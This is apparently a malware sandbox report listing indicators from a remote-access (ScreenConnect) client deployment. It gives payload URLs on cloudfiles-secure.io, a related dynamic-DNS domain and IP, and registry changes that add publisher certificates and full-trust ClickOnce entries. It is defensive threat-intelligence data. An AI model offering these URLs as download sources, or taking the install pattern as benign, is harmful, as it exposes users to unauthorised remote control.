https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationx
|
unknown
|
||
https://login.live.c
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
|
unknown
|
||
http://upx.sf.net
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/scst
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifestt
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfU
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
|
unknown
|
||
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
|
unknown
|
||
https://account.live.com/Wizard/Password/Change?id=80601
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80601
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/sc1e
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80600
|
unknown
|
||
https://cloudfiles-secure.io
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.Win
|
unknown
|
||
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServi
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
cloudfiles-secure.io
|
178.215.236.119
|
||
ttyuio.zapto.org
|
178.215.236.119
|
||
fp2e7a.wpc.phicdn.net
|
192.229.221.95
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
178.215.236.119
|
cloudfiles-secure.io
|
Germany
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
|
Blob
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
|
Blob
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
|
ComponentStore_RandomString
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
|
ComponentStore_RandomString
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
|
StateStore_RandomString
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
|
Blob
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
|
NonCanonicalData
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
lock!010000004e01ef06ac040000d417000000000000000000007475edc18215db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
|
NonCanonicalData
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingBind
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ExcludedDeployment
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingDeployment
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentProviderUri
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!MinimumRequiredVersion
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!LastCheckTime
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkippedDeployment
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkipTime
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!AppType
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!CurrentBind
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
|
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_b6360a9ca24441a4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files
|
ScreenConnect.Client.dll_fc1d7bd48553fcab
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files
|
ScreenConnect.ClientService.dll_e781b1c636f7bfae
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files
|
ScreenConnect.ClientService.dll_e781b1c636f7bfae
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Files
|
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Files
|
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files
|
ScreenConnect.WindowsClient.exe_6492277df2db17d2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files
|
ScreenConnect.WindowsClient.exe_6492277df2db17d2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files
|
ScreenConnect.Core.dll_b96889d378047e27
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files
|
ScreenConnect.Core.dll_b96889d378047e27
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment
|
OnlineAppQuotaUsageEstimate
|
||
